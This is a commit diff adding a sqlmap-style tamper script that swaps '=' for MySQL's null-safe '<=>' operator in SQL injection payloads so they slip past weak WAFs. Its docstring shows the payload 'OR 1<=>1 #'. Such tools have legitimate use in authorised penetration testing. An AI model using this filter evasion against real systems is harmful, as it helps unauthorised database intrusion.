Create equal2nullsafequals.py

tamper/equal2nullsafequals.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python3
+"""
+Tamper script to replace '=' with '<=>'
+MySQL-only NULL-safe equality operator.
+Useful for bypassing filters that block '='.
+
+Author: relunsec
+"""
+
+from lib.core.enums import PRIORITY
+import re
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+    """
+    Replaces equal signs (=) with MySQL null-safe equal operator (<=>) Sometime bypass Weak WAF/Filters filter (=) sign
+
+    Requirement:
+        * MySQL
+
+    >>> tamper("OR 1=1 #")
+    'OR 1<=>1 #'
+    """
+    if not payload:
+        return payload
+    # Replace '=' with '<=>'
+    payload = re.sub(r'(?<![><!])=(?!=)', '<=>', payload)
+    return payload